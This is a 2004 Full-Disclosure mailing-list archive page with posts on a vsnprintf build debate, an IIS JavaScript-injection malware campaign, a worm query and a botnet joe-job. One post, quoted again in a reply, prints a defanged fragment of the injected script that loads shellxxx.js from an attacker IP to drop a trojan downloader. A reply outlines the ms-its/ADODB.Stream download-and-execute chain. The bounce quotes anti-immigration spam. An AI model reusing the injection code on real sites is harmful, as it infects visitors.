> nice with the vendor's stdio - this can be .. umm... "interesting" if the
> innards of the vendor stdio are more bizzare than usual...

vsnprintf() does not have to "play nice" with stdio. It does not have to
play with stdio at all. You don't need to mess with stdio in order to
stuff some characters into an array.

> Go ahead - go and re-write a vsnprintf, and compare that to the time it
> takes to do the #define

It is rather easy as long as everything you need are common string and
integer directives. Indeed, floats are tricky. Exotic C99 is even more
tricky. But I think the set of printf features required by dhcpd and
similar programs is (or should be) pretty small.

--Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: [FD] Evidence of a ISC being hacked?

From: Thomas Binder (full-disclosurearago.de)
Date: Thu Jun 24 2004 - 17:33:25 CDT

Hi!

On Thu, Jun 24, 2004 at 03:38:27PM -0400, Valdis.Kletnieksvt.edu wrote:
> 1) The wrapper/define/handwaving discards it and prays.
>
> 2) The replacement function does a proper job of doing a full enough
> emulation of vsnprintf to keep track of "length so far" and stop
> when it gets full (not as easy as you might think - for fun, compute
> how many bytes this takes:

3) Only useable on systems with /dev/null: fopen() /dev/null,
   vfprintf() to that handle and take the return value - it
   contains the number of characters written (or -1 on error).
   Then malloc() a temporary buffer to hold the complete output,
   vsprintf() to it and strncpy() to the destination array.

Of course, this might not be a suitable solution in a performance
sensitive application, but it's only a workaround for a missing
function anyway.

Ciao

Thomas

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (IRIX64)

iD8DBQFA21a1J+FIGCekM7URAi4pAKC6cojtZlaR86CBiSVGWAaVw2WdPQCgqlyG
2FneIRRaisRzIwEcxEX9wZU=
=znUu
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Evidence of a ISC being hacked?

From: Eric Paynter (ericarcticbears.com)
Date: Thu Jun 24 2004 - 17:31:47 CDT

On Thu, June 24, 2004 11:22 am, VX Dude said:
> Good point, personally I wouldn't think that making a
> small wrapper would take that long, but then again I
> havent done it, and I havent done it under stress and
> a time crunch. I code for fun and not profit which is
> pretty stress free.

Isn't the software we're talking about open source? Where the profit and
time crunch? If it's a real concern, just fix it and submit your patch...

-Eric

--
arctic bears - affordable email and name services yourdomain.com
http://www.arcticbears.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] IE exploit runs code from graphics?

From: Larry Seltzer (larrylarryseltzer.com)
Date: Thu Jun 24 2004 - 18:02:01 CDT

From http://www.eweek.com/article2/0,,1617045,00.asp:

"Analysts at NetSec Inc., a managed security services provider, began seeing indications
of the compromises early Thursday morning and have since seen a large number of
identical attacks on their customers' networks. The attack uses a novel vector: embedded
code hidden in graphics on Web pages... NetSec officials said the attack seems to
exploit a vulnerability in Internet Explorer."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] New malware to infect IIS and from there jump to clients

From: Peter Kruse (krusekrusesecurity.dk)
Date: Thu Jun 24 2004 - 18:22:11 CDT

Hi all,

This is a heads up.

A new malware has been reported from several sources so it appears to be
fairly widespread already.

The malware spreads from infected IIS servers to clients that visit the
webpage of the infected server. How the IIS servers was compromised in the
first place is unfortunately still unknown (any info on that would be
appreciated).

The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does
so by running a javascript that apparently gets appended to several files in
the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http://
217.107.218.147/xxx.html that contains the following code:

<script language="Javascript">

    function InjectedDuringRedirection(){
      showModalDialog('md.htm', window, "dialog
Top: -10000\;dialogLeft:-10000\;dialog Height :1\;dialog Width
:1\;").location= " java script:'<SCRIPT SRC =\\' http://
217.107.218.147/shellxxx.js\\'> <\ /script>'";

[snip - you get the picture, right?]

I had to put in some spaces to get past trivial content filtering.

From that point it will try to run the malware in a 1x1 dialogbox in the
following order:

shellscript_loadxxx.js
shellxxx.js

The shellxxx.js will try to drop "msits.exe" (51.712 bytes) a
trojan-downloader and run it.

Consider to deny access to http://217.107.218.147 in your firewall. This
will at least prevent client PCs from getting infected.

Further information can be found in the daily log from SANS:
http://isc.sans.org/

Regards
Peter Kruse
http://www.csis.dk

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] IE exploit runs code from graphics?

From: Heather M. Guse Bryan (hbryandpntech.com)
Date: Thu Jun 24 2004 - 18:58:41 CDT

Is this related to the diary entry on:

http://www.incidents.org

-----Original Message-----
From: Larry Seltzer [mailto:larrylarryseltzer.com]
Sent: Thursday, June 24, 2004 6:02 PM
To: full-disclosurelists.netsys.com
Subject: [Full-Disclosure] IE exploit runs code from graphics?

From http://www.eweek.com/article2/0,,1617045,00.asp:

"Analysts at NetSec Inc., a managed security services provider, began seeing
indications
of the compromises early Thursday morning and have since seen a large number
of
identical attacks on their customers' networks. The attack uses a novel
vector: embedded
code hidden in graphics on Web pages... NetSec officials said the attack
seems to
exploit a vulnerability in Internet Explorer."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: IE exploit runs code from graphics?

From: Joe Stewart (jstewartlurhq.com)
Date: Thu Jun 24 2004 - 19:57:45 CDT

On Thu, 24 Jun 2004 19:02:01, larrylarryseltzer.com wrote:
> From http://www.eweek.com/article2/0,,1617045,00.asp:
>
> "Analysts at NetSec Inc., a managed security services provider, began
> seeing indications of the compromises early Thursday morning and have
> since seen a large number of identical attacks on their customers' networks.
> The attack uses a novel vector: embedded code hidden in graphics on Web
> pages... NetSec officials said the attack seems to exploit a vulnerability
> in Internet Explorer."

This is somewhat misleading. The attack is appending javascript footers to
every file served by the IIS server, including image files. This isn't a new
vector, it's just a side-effect. More information at http://isc.sans.org/

-Joe

--
Joe Stewart, GCIH
Senior Security Researcher
LURHQ http://www.lurhq.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients

From: Nick FitzGerald (nickvirus-l.demon.co.uk)
Date: Thu Jun 24 2004 - 20:10:46 CDT

"Peter Kruse" <krusekrusesecurity.dk> wrote:

> This is a heads up.

Or...

PANIC, PANIC, PANIC...

> A new malware has been reported from several sources so it appears to be
> fairly widespread already.
>
> The malware spreads from infected IIS servers to clients that visit the
> webpage of the infected server. How the IIS servers was compromised in the
> first place is unfortunately still unknown (any info on that would be
> appreciated).

There is _no_ evidence (yet) that this is spreading from "infected" IIS
servers. _Some_ IIS admins whose servers are involved don't know how
the content got on their servers, but that is far from grounds for
claiming said servers are, or even may be, "infected". Of course they
might be, but history suggests that slack admin'ing is at least as
likely as an explanation...

> The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does
> so by running a javascript that apparently gets appended to several files in
> the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http://
> 217.107.218.147/xxx.html that contains the following code:
>
> <script language="Javascript">
>
> function InjectedDuringRedirection(){
>  showModalDialog('md.htm', window, "dialog
> Top: -10000\;dialogLeft:-10000\;dialog Height :1\;dialog Width
> :1\;").location= " java script:'<SCRIPT SRC =\\' http://
> 217.107.218.147/shellxxx.js\\'> <\ /script>'";
>
> [snip - you get the picture, right?]
>
> I had to put in some spaces to get past trivial content filtering.
>
> From that point it will try to run the malware in a 1x1 dialogbox in the
> following order:
>
> shellscript_loadxxx.js
> shellxxx.js
>
> The shellxxx.js will try to drop "msits.exe" (51.712 bytes) a
> trojan-downloader and run it.

It does this via the now very old ms-its: protocol zone-handling bug...
Apparently someone needs to decode a few more levels of JavaScript, etc
to work this all out...

> Consider to deny access to http://217.107.218.147 in your firewall. This
> will at least prevent client PCs from getting infected.

Thanks Peter, but what about all the _other_ servers out there also
hosting more or less exactly the same files? Are you going to provide
a list of all those IPs too?

I've seen several (probably 5 or 6 others) in the last week or so with
all the same files or just one difference (ignoring the trivial script
differences necessitated by referring to different hosts) -- the .EXE
that is eventually downloaded is a different variant.

> Further information can be found in the daily log from SANS:
> http://isc.sans.org/

Woohoo -- SANS incident handlers have reported one incident of this
they know about so the sky must be falling!

Next...

--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] IE exploit runs code from graphics?

From: Nick FitzGerald (nickvirus-l.demon.co.uk)
Date: Thu Jun 24 2004 - 20:43:54 CDT

"Larry Seltzer" <larrylarryseltzer.com> wrote:

> From http://www.eweek.com/article2/0,,1617045,00.asp:
>
> "Analysts at NetSec Inc., a managed security services provider,
> began seeing indications of the compromises early Thursday morning
> and have since seen a large number of identical attacks on their
> customers' networks. The attack uses a novel vector: embedded code
> hidden in graphics on Web pages... NetSec officials said the attack
> seems to exploit a vulnerability in Internet Explorer."

Without having access to any of the information as to what web pages
NetSec thinks is involved, but having seen many recent posts about the
so-called "RFI - Russian IIS Hacks" I'd suggest that both reports are
referring to one and the same, or at least, very closely related,
things.

Common exploits of the ms-its: (etc) protocol download compiled help
files (.CHM) from some web site, causing the HTML code inside the .CHM
to be run in the "My Computer" security zone. Typically (like all but
one of _dozens and dozens_ of these I've seen) the "inner" HTML run
from the .CHM then uses a lightly modified form of one of the common
ADODB.Stream PoC exploits to download yet another file, save it as a
.EXE and run it. Sometimes the file the ADODB exploit code pulls down
will be named with a .GIF or .JPG extension (it can be _any_ extension
the attacker likes as the ADODB.Stream vuln allows the attacker to
specifiy the target filename and path on the new victim machine _in
full_).

That is hardly the same thing as "embedded code hidden in graphics on
Web pages", but I can easily imagine a naïve journalist getting
confused over such technical issues or a company representative
hankering for some media exposure over-selling the seriousness or
novelty of what they "discovered"...

--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] IE exploit runs code from graphics?

From: Larry Seltzer (larrylarryseltzer.com)
Date: Thu Jun 24 2004 - 21:12:31 CDT

>>Without having access to any of the information as to what web pages NetSec thinks is
involved,
>>but having seen many recent posts about the so-called "RFI - Russian IIS Hacks" I'd
suggest
>>that both reports are referring to one and the same, or at least, very closely
related, things.
>>...
>>That is hardly the same thing as "embedded code hidden in graphics on Web pages"...

Yup, once I saw the SANS writeups I came to the same conclusion. So there's nothing
really new in the client-side exploit and what's happening on the server hasn't been
figured out yet, right? And it sounds like if you're up to date on patches and antivirus
you're probably protected against the client-side exploit.

Larry Seltzer

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] New Worm Discovery - Potential Korgo Variant

From: Aditya, ALD [ Aditya Lalit Deshmukh ] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Thu Jun 24 2004 - 22:34:53 CDT



  Yesterday a large client of ours was taken down by what appears to be a Korgo variant, but I have been unable to locate any information on this worm. From what we have discovered, the main process is 'VDisp.exe'. It is spreading through unpatched systems vulnerable to the LSASS exploit, and propagates itself through a serious of randomly chosen ports. The worm creates randomly generated services that initialize the process, and also creates a registry entry in RunServices and Run to load. I am anxious to hear any feedback anyone has regarding this issue as we are still attempting to reduce network traffic and alleviate any remaining issues. I have attached a copy of the executable (rename to .exe).









  Where is the .exe file ? if possible write a snort sig for this to isolate which machines are infected and patch them ! for the services if you find any unfamiliar services simply stop them and set the autostart to disables also make a script like this and just run it from the login script and have that script run on all the machies also if possible put the patch in this script also.



  -Aditya





éb½êÞvë"ž axZÞx÷«²‰Ú”Gb¶*'¡óŠ[kj¬0Âf¢–ÚÚ©Ê&

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] defamatory joe job attack by botnet

From: lsi (stuartcyberdelix.net)
Date: Thu Jun 24 2004 - 22:43:20 CDT

On June 11 it was reported that Dutch mailboxes were flooded with racist
hatemail sent via the Sobig worm.

http://www.theregister.co.uk/2004/06/11/german_hate_mail_virus/

I can report that not only is this activity continuing, but it is
doing so under the names of ... well, me, at least - I have received
several bounces indicating that my email address is being used as the
"from" address.

I include the fulltext of a sample bounce below. Note: the text is
reportedly racist in nature. I include it for forensic purposes.
This is the full disclosure list, right?

Maybe it was just me who got joe-jobbed by Sobig in this way? Or
maybe there are some other posters to the security conferences who
are being toasted too?

Note: 82.3.47.243 is apparently a cable connection owned by NTL UK.
Probably just an owned box though. And probably a dynamic IP as
well.

Stuart

[ok, I trimmed these headers, irrelevant]
Date: Thu, 24 Jun 2004 13:05:42 +0100 (BST)
From: MAILER-DAEMONpfmx1.pop.uk.netscalibur.com (Mail Delivery System)
Subject: Undelivered Mail Returned to Sender
To: stuartcyberdelix.net

This is a MIME-encapsulated message.

--69D9D6749F5.1088078742/pfmx1.pop.uk.netscalibur.com
Content-Description: Notification
Content-Type: text/plain

This is the Postfix program at host pfmx1.pop.uk.netscalibur.com.

I'm sorry to have to inform you that the message returned
below could not be delivered to one or more destinations.

For further assistance, please send mail to <postmaster>

If you do so, please include this problem report. You can
delete your own text from the message returned below.

                        The Postfix program

<louisecyrus02.pop.uk.netscalibur.com>: host
    cyrus02.store.pop.uk.netscalibur.com[194.112.32.39] said: 552 5.2.2 Over
    quota (in reply to RCPT TO command)

--69D9D6749F5.1088078742/pfmx1.pop.uk.netscalibur.com
Content-Description: Delivery error report
Content-Type: message/delivery-status

Reporting-MTA: dns; pfmx1.pop.uk.netscalibur.com
Arrival-Date: Thu, 24 Jun 2004 13:05:42 +0100 (BST)

Final-Recipient: rfc822; louisecyrus02.pop.uk.netscalibur.com
Action: failed
Status: 5.0.0
Diagnostic-Code: X-Postfix; host
    cyrus02.store.pop.uk.netscalibur.com[194.112.32.39] said: 552 5.2.2 Over
    quota (in reply to RCPT TO command)

--69D9D6749F5.1088078742/pfmx1.pop.uk.netscalibur.com
Content-Description: Undelivered Message
Content-Type: message/rfc822
Content-Transfer-Encoding: 8bit

Received: from rmx5.dircon.net (rmx5.dircon.net [195.157.4.7])
        by pfmx1.pop.uk.netscalibur.com (Postfix) with ESMTP id 69D9D6749F5
        for <louisedircon.co.uk>; Thu, 24 Jun 2004 13:05:42 +0100 (BST)
Received: from qmx0.uk.netscalibur.com (qmx0.uk.netscalibur.com [194.112.32.44])
        by rmx5.dircon.net (Mirapoint Messaging Server MOS 3.3.5-GR)
        with SMTP id AVI60539;
        Thu, 24 Jun 2004 13:04:08 +0100 (BST)
Received: (qmail 95729 invoked from network); 24 Jun 2004 12:04:33 -0000
Cc: recipient list not shown: ;
Received: from unknown (HELO yddcfxtx.net) (82.3.47.243)
  by 194.112.32.44 with SMTP id 1088078670X93760X0; 24 Jun 2004 12:04:30 -0000
From: stuartcyberdelix.net
Date: Thu, 24 Jun 2004 11:33:35 GMT
MIME-Version: 1.0
Subject: EU Beitritt der Tuerkei ? (Id:9951)
Importance: Normal
X-Priority: 3 (Normal)
Message-ID: <4148b811e04d28.e372b.qmailcyberdelix.net>
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="us-ascii"

Aufnahme der Beitrittsverhandlungen mit der Tuerkei oder nicht - eine Entscheidung, die 'das Ende Europas' bedeuten koennte. Dieses Wort stammt vom frueheren franzoesischen Praesidenten Giscard d'Estaing.
Schon 2002 hatte er davor gewarnt, dass ein Beitritt der Tuerkei zur EU dem 'Ende Europas' gleichkaeme. Die bundesdeutschen Beitrittsbefuerworter verdraengen und verschweigen die unabsehbaren Folgen dieser Entscheidung:

(1) Die Tuerkei hat schon jetzt 70 Millionen Einwohner. Sie wird bis zu ihrem EU-Beitritt die BRD in der Bevoelkerungszahl ueberholt haben und in den EU-Institutionen das entsprechende Stimmengewicht erhalten.
(2) Die Tuerkei passt wirtschaftlich nicht in die EU. Das Land ist hoffnungslos ueberschuldet und waere ohne staendige internationalen Kredite laengst bankrott. Das Pro-Kopf-Einkommen betraegt nur 23% des EU-Durchschnitts. Die EU-Subventionen, auf die die Tuerkei Anspruch haette, wuerden nicht nur den Bruesseler Haushalt sprengen, sondern auch die heute schon ueberschuldeten 'Geberlaender' wie die BRD gaenzlich ruinieren.
(3) Mit der Aufnahme eines asiatischen Landes und dem Verzicht auf vernuenftige Aussengrenzen verliert die EU ihre Identitaet.

Trotz dieser unbestreitbaren Sprengsaetze rollt die Kampagne fuer den tuerkischen Beitritt immer schneller und unaufhaltsamer voran: Der tuerkische Regierungschef Erdogan nimmt bereits an den Konferenzen der EU-Regierungschefs teil, freilich noch ohne Stimmrecht und die Tuerkei erhaelt jetzt schon EU-Gelder zur 'Beitrittsvorbereitung'.
Es ist alles wie bei der Euro-Einfuehrung: Erst erscheint der ganze Plan unrealistisch und wird von vielen fuer undurchfuehrbar gehalten; dann wird eine offene Diskussion ueber Pro und Contra als 'europa- oder fremdenfeindlich' kriminalisiert, und schliesslich wird die Entscheidung hinter verschlossenen Tueren, ohne Beteiligung des demokratischen Souveraens und ohne Volksabstimmung gefaellt und fuer unumkehrbar erklaert.
Dasselbe Spiel mit den Vorbedingungen: Beim Euro waren es die Maastrichter Kriterien, die schon vor 1999 nicht erfuellt wurden und inzwischen offen missachtet werden. Die Tuerkei-Kriterien heissen: Wiedervereinigung Zyperns (als ob das so wichtig waere), Menschenrechte, Demokratisierung. Nichts hindert Ankara daran, diese Bedingungen pro forma zu erfuellen. Selbst wenn sie erfuellt wuerden, waeren damit die oben angefuehrten grundlegenden Argumente gegen den Tuerkei-Beitritt nicht im geringsten widerlegt.
Ein uebles Spiel, das den Verdacht naehrt, hier werde eine Verschwoerung gegen Deutschland und Europa angezettelt. Berlin hat sich ohne jedes Waehlermandat bereits festgelegt. Sollte der Beitritt scheitern, sagte Aussenminister Fischer laut 'WamS' vom 8. 2. 2004, wuerde man dafuer 'einen sehr hohen Preis zahlen'.

Ein Satz, den man zweimal lesen muss. Fischer droht dem deutschen Volk. Worin der hohe Preis bestehen wuerde, verschweigt er. Vielleicht meint er, dass die in Deutschland lebenden Tuerken auf die Strasse gehen koennten. Oder er fuerchtet den Zorn der USA, die den Beitritt seit Jahren verlangen. Washington weiss genau, dass die Aufnahme Kleinasiens zu einem 'bankrotten Halt' der gesamten EU (so die 'Financial Times' vom 15.1.2004) fuehren koennte. Ganz nuechtern urteilt die 'International Herald Tribune' am
24.11.2003:

'Dass die Bevoelkerung in ganz Europa schrumpft, bedeutet, dass noch mehr Einwanderung bevorsteht. Die Aufnahme der Tuerkei als EU-Mitglied wuerde diesen Trend beschleunigen und die Definition Europas unwiderruflich aendern … Viele Europaeer muessen erst noch akzeptieren, dass die traditionell weisse, christliche Kultur ihrer Vorfahren abgeloest wird von einem multikulturellen Mix mit einem starken islamischen Gewicht.'

--69D9D6749F5.1088078742/pfmx1.pop.uk.netscalibur.com--

-- End --
------- End of forwarded message -------

---
Stuart Udall
stuart atcyberdelix.dot net - http://www.cyberdelix.net/

---
 * Origin: lsi: revolution through evolution (192.168.0.2)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] defamatory joe job attack by botnet

From: Kane Lightowler (Kanecontentsecurity.com.au)
Date: Thu Jun 24 2004 - 23:10:25 CDT

I can also confirm that this is continuing from one of my many email adresses also.

Regards,

Kane Lightowler
Network Security Consultant

Content Security
Level 4, Suite 42c
203 Castlereagh Street
Sydney 2000

> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com]On Behalf Of lsi
> Sent: Friday, June 25, 2004 1:43 PM
> To: full-disclosurelists.netsys.com
> Subject: [Full-Disclosure] defamatory joe job attack by botnet
>
>
> On June 11 it was reported that Dutch mailboxes were flooded
> with racist
> hatemail sent via the Sobig worm.
>
> http://www.theregister.co.uk/2004/06/11/german_hate_mail_virus/
>
> I can report that not only is this activity continuing, but it is
> doing so under the names of ... well, me, at least - I have received
> several bounces indicating that my email address is being used as the
> "from" address.
>
> I include the fulltext of a sample bounce below. Note: the text is
> reportedly racist in nature. I include it for forensic purposes.
> This is the full disclosure list, right?
>
> Maybe it was just me who got joe-jobbed by Sobig in this way? Or
> maybe there are some other posters to the security conferences who
> are being toasted too?
>
> Note: 82.3.47.243 is apparently a cable connection owned by NTL UK.
> Probably just an owned box though. And probably a dynamic IP as
> well.
>
> Stuart
>
> [ok, I trimmed these headers, irrelevant]
> Date: Thu, 24 Jun 2004 13:05:42 +0100 (BST)
> From: MAILER-DAEMONpfmx1.pop.uk.netscalibur.com (Mail
> Delivery System)
> Subject: Undelivered Mail Returned to Sender
> To: stuartcyberdelix.net
>
> This is a MIME-encapsulated message.
>
> --69D9D6749F5.1088078742/pfmx1.pop.uk.netscalibur.com
> Content-Description: Notification
> Content-Type: text/plain
>
> This is the Postfix program at host pfmx1.pop.uk.netscalibur.com.
>
> I'm sorry to have to inform you that the message returned
> below could not be delivered to one or more destinations.
>
> For further assistance, please send mail to <postmaster>
>
> If you do so, please include this problem report. You can
> delete your own text from the message returned below.
>
> The Postfix program
>
> <louisecyrus02.pop.uk.netscalibur.com>: host
> cyrus02.store.pop.uk.netscalibur.com[194.112.32.39] said:
> 552 5.2.2 Over
> quota (in reply to RCPT TO command)
>
> --69D9D6749F5.1088078742/pfmx1.pop.uk.netscalibur.com
> Content-Description: Delivery error report
> Content-Type: message/delivery-status
>
> Reporting-MTA: dns; pfmx1.pop.uk.netscalibur.com
> Arrival-Date: Thu, 24 Jun 2004 13:05:42 +0100 (BST)
>
> Final-Recipient: rfc822; louisecyrus02.pop.uk.netscalibur.com
> Action: failed
> Status: 5.0.0
> Diagnostic-Code: X-Postfix; host
> cyrus02.store.pop.uk.netscalibur.com[194.112.32.39] said:
> 552 5.2.2 Over
> quota (in reply to RCPT TO command)
>
> --69D9D6749F5.1088078742/pfmx1.pop.uk.netscalibur.com
> Content-Description: Undelivered Message
> Content-Type: message/rfc822
> Content-Transfer-Encoding: 8bit
>
> Received: from rmx5.dircon.net (rmx5.dircon.net [195.157.4.7])
> by pfmx1.pop.uk.netscalibur.com (Postfix) with ESMTP id
> 69D9D6749F5
> for <louisedircon.co.uk>; Thu, 24 Jun 2004 13:05:42 +0100 (BST)
> Received: from qmx0.uk.netscalibur.com
> (qmx0.uk.netscalibur.com [194.112.32.44])
> by rmx5.dircon.net (Mirapoint Messaging Server MOS 3.3.5-GR)
> with SMTP id AVI60539;
> Thu, 24 Jun 2004 13:04:08 +0100 (BST)
> Received: (qmail 95729 invoked from network); 24 Jun 2004
> 12:04:33 -0000
> Cc: recipient list not shown: ;
> Received: from unknown (HELO yddcfxtx.net) (82.3.47.243)
> by 194.112.32.44 with SMTP id 1088078670X93760X0; 24 Jun
> 2004 12:04:30 -0000
> From: stuartcyberdelix.net
> Date: Thu, 24 Jun 2004 11:33:35 GMT
> MIME-Version: 1.0
> Subject: EU Beitritt der Tuerkei ? (Id:9951)
> Importance: Normal
> X-Priority: 3 (Normal)
> Message-ID: <4148b811e04d28.e372b.qmailcyberdelix.net>
> Content-Transfer-Encoding: 7bit
> Content-Type: text/plain; charset="us-ascii"
>
> Aufnahme der Beitrittsverhandlungen mit der Tuerkei oder
> nicht - eine Entscheidung, die 'das Ende Europas' bedeuten
> koennte. Dieses Wort stammt vom frueheren franzoesischen
> Praesidenten Giscard d'Estaing.
> Schon 2002 hatte er davor gewarnt, dass ein Beitritt der
> Tuerkei zur EU dem 'Ende Europas' gleichkaeme. Die
> bundesdeutschen Beitrittsbefuerworter verdraengen und
> verschweigen die unabsehbaren Folgen dieser Entscheidung:
>
> (1) Die Tuerkei hat schon jetzt 70 Millionen Einwohner. Sie
> wird bis zu ihrem EU-Beitritt die BRD in der
> Bevoelkerungszahl ueberholt haben und in den EU-Institutionen
> das entsprechende Stimmengewicht erhalten.
> (2) Die Tuerkei passt wirtschaftlich nicht in die EU. Das
> Land ist hoffnungslos ueberschuldet und waere ohne staendige
> internationalen Kredite laengst bankrott. Das
> Pro-Kopf-Einkommen betraegt nur 23% des EU-Durchschnitts. Die
> EU-Subventionen, auf die die Tuerkei Anspruch haette, wuerden
> nicht nur den Bruesseler Haushalt sprengen, sondern auch die
> heute schon ueberschuldeten 'Geberlaender' wie die BRD
> gaenzlich ruinieren.
> (3) Mit der Aufnahme eines asiatischen Landes und dem
> Verzicht auf vernuenftige Aussengrenzen verliert die EU ihre
> Identitaet.
>
> Trotz dieser unbestreitbaren Sprengsaetze rollt die Kampagne
> fuer den tuerkischen Beitritt immer schneller und
> unaufhaltsamer voran: Der tuerkische Regierungschef Erdogan
> nimmt bereits an den Konferenzen der EU-Regierungschefs teil,
> freilich noch ohne Stimmrecht und die Tuerkei erhaelt jetzt
> schon EU-Gelder zur 'Beitrittsvorbereitung'.
> Es ist alles wie bei der Euro-Einfuehrung: Erst erscheint der
> ganze Plan unrealistisch und wird von vielen fuer
> undurchfuehrbar gehalten; dann wird eine offene Diskussion
> ueber Pro und Contra als 'europa- oder fremdenfeindlich'
> kriminalisiert, und schliesslich wird die Entscheidung hinter
> verschlossenen Tueren, ohne Beteiligung des demokratischen
> Souveraens und ohne Volksabstimmung gefaellt und fuer
> unumkehrbar erklaert.
> Dasselbe Spiel mit den Vorbedingungen: Beim Euro waren es die
> Maastrichter Kriterien, die schon vor 1999 nicht erfuellt
> wurden und inzwischen offen missachtet werden. Die
> Tuerkei-Kriterien heissen: Wiedervereinigung Zyperns (als ob
> das so wichtig waere), Menschenrechte, Demokratisierung.
> Nichts hindert Ankara daran, diese Bedingungen pro forma zu
> erfuellen. Selbst wenn sie erfuellt wuerden, waeren damit die
> oben angefuehrten grundlegenden Argumente gegen den
> Tuerkei-Beitritt nicht im geringsten widerlegt.
> Ein uebles Spiel, das den Verdacht naehrt, hier werde eine
> Verschwoerung gegen Deutschland und Europa angezettelt.
> Berlin hat sich ohne jedes Waehlermandat bereits festgelegt.
> Sollte der Beitritt scheitern, sagte Aussenminister Fischer
> laut 'WamS' vom 8. 2. 2004, wuerde man dafuer 'einen sehr
> hohen Preis zahlen'.
>
> Ein Satz, den man zweimal lesen muss. Fischer droht dem
> deutschen Volk. Worin der hohe Preis bestehen wuerde,
> verschweigt er. Vielleicht meint er, dass die in Deutschland
> lebenden Tuerken auf die Strasse gehen koennten. Oder er
> fuerchtet den Zorn der USA, die den Beitritt seit Jahren
> verlangen. Washington weiss genau, dass die Aufnahme
> Kleinasiens zu einem 'bankrotten Halt' der gesamten EU (so
> die 'Financial Times' vom 15.1.2004) fuehren koennte. Ganz
> nuechtern urteilt die 'International Herald Tribune' am
> 24.11.2003:
>
> 'Dass die Bevoelkerung in ganz Europa schrumpft, bedeutet,
> dass noch mehr Einwanderung bevorsteht. Die Aufnahme der
> Tuerkei als EU-Mitglied wuerde diesen Trend beschleunigen und
> die Definition Europas unwiderruflich aendern ... Viele
> Europaeer muessen erst noch akzeptieren, dass die
> traditionell weisse, christliche Kultur ihrer Vorfahren
> abgeloest wird von einem multikulturellen Mix mit einem
> starken islamischen Gewicht.'
>
> --69D9D6749F5.1088078742/pfmx1.pop.uk.netscalibur.com--
>
> -- End --
> ------- End of forwarded message -------
>
> ---
> Stuart Udall
> stuart atcyberdelix.dot net - http://www.cyberdelix.net/
>
> ---
> * Origin: lsi: revolution through evolution (192.168.0.2)
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Evidence of a ISC being hacked?

From: VX Dude (vxdude2003yahoo.com)
Date: Thu Jun 24 2004 - 23:12:46 CDT

--- Eric Paynter <ericarcticbears.com> wrote:
> On Thu, June 24, 2004 11:22 am, VX Dude said:
> > Good point, personally I wouldn't think that
> making a
> > small wrapper would take that long, but then again
> I
> > havent done it, and I havent done it under stress
> and
> > a time crunch. I code for fun and not profit
> which is
> > pretty stress free.
>
> Isn't the software we're talking about open source?
> Where the profit and
> time crunch? If it's a real concern, just fix it and
> submit your patch...
>
> -Eric

the profit and time crunch was in reference to
Valdis.Kletnieks who said the following words
(probably out of context please read the thread for
full value)

"...and the build broke on OTHER systems
because there wasn't a vsnprintf() in the vendor libc
- and your boss is
telling you TO GET THE THING TO BUILD, NOW....

The programmer who is willing to swear on a Bible that
they have *never* in
their professional careers done something like this
because they were in a
time crunch is either a newbie or a complete liar."

The word "boss" give me the illusion of some profit
being made. Once again I could just be paranoid.

Apparently the idea of people patching open source
products just shows how much of a newbs we are.

-stiny

        
                
__________________________________
Do you Yahoo!?
New and Improved Yahoo! Mail - 100MB free storage!
http://promotions.yahoo.com/new_mail

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] server administration

From: misiu_ (misiu_gmx.de)
Date: Thu Jun 24 2004 - 23:26:41 CDT

> we have some 100+ servers here, and we would like to make an inventory
> of all the servers. each server has a service tag etc... all servers
> have one or more services running on it.
>
> the idea is: we would like everything (config, static information,
> dynamic info,...) on a central server in a secure intranet.
> the first problem:
> how do you collect the data, how do you store it,what software do you
> use to get info out of a server (static info as wel as dynamic info).
> ^^^^^^ ^^^^^^^
> a script? snmp
> second problem:
> what soft can you use for pushing the config to the servers and
> restarting servers, without having to log in to each one individually
